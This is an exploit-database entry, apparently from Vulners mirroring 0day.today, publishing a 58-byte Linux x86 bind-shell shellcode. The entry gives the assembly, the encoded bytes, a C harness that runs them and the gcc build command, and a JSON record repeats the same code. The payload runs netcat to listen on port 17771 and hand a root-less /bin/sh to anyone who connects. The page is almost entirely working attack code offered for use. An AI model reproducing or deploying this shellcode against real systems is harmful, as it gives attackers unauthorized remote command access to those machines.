Search...

linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode - 58 Bytes

2015-05-16T00:00:00

ID 1337DAY-ID-23635
Type zdt
Reporter Oleg Boytsev
Modified 2015-05-16T00:00:00

Description

                                        
                                            /*
# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode
# This shellcode will listen on port 17771 and give you /bin/sh
# Shellcode Author: Oleg Boytsev
# Tested on: Debian GNU/Linux 7/i686
# Shellcode Length: 58
# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
 
global _start
section .text
 _start:
    xor eax, eax
    xor edx, edx
    push eax
    push 0x31373737     ;-vp17771
    push 0x3170762d
    mov esi, esp
 
    push eax
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp
 
    push eax
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp
 
    push edx
    push esi
    push edi
    push ebx
    mov ecx, esp
    mov al,11
    int 0x80
*/
 
#include&lt;stdio.h&gt;
#include&lt;string.h&gt;
 
unsigned char shellcode[] =
"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
 
main()
{
        printf("Shellcode Length: %d\n",strlen(shellcode));
        int (*ret)() = (int(*)())shellcode;
        ret();
}

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-23635", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode - 58 Bytes", "description": "", "published": "2015-05-16T00:00:00", "modified": "2015-05-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/23635", "reporter": "Oleg Boytsev", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-04T16:11:35", "viewCount": 6, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/23635", "sourceData": "/*\n# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode\n# This shellcode will listen on port 17771 and give you /bin/sh\n# Shellcode Author: Oleg Boytsev\n# Tested on: Debian GNU/Linux 7/i686\n# Shellcode Length: 58\n# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode\n \nglobal _start\nsection .text\n _start:\n xor eax, eax\n xor edx, edx\n push eax\n push 0x31373737 ;-vp17771\n push 0x3170762d\n mov esi, esp\n \n push eax\n push 0x68732f2f ;-le//bin//sh\n push 0x6e69622f\n push 0x2f656c2d\n mov edi, esp\n \n push eax\n push 0x636e2f2f ;/bin//nc\n push 0x6e69622f\n mov ebx, esp\n \n push edx\n push esi\n push edi\n push ebx\n mov ecx, esp\n mov al,11\n int 0x80\n*/\n \n#include<stdio.h>\n#include<string.h>\n \nunsigned char shellcode[] =\n\"\\x31\\xc0\\x31\\xd2\\x50\\x68\\x37\\x37\\x37\\x31\\x68\\x2d\\x76\\x70\\x31\\x89\\xe6\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x68\\x2d\\x6c\\x65\\x2f\\x89\\xe7\\x50\\x68\\x2f\\x2f\\x6e\\x63\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x56\\x57\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\n \nmain()\n{\n printf(\"Shellcode Length: %d\\n\",strlen(shellcode));\n int (*ret)() = (int(*)())shellcode;\n ret();\n}\n", "category": "shellcode", "verified": true, "_state": {"dependencies": 1645239976}}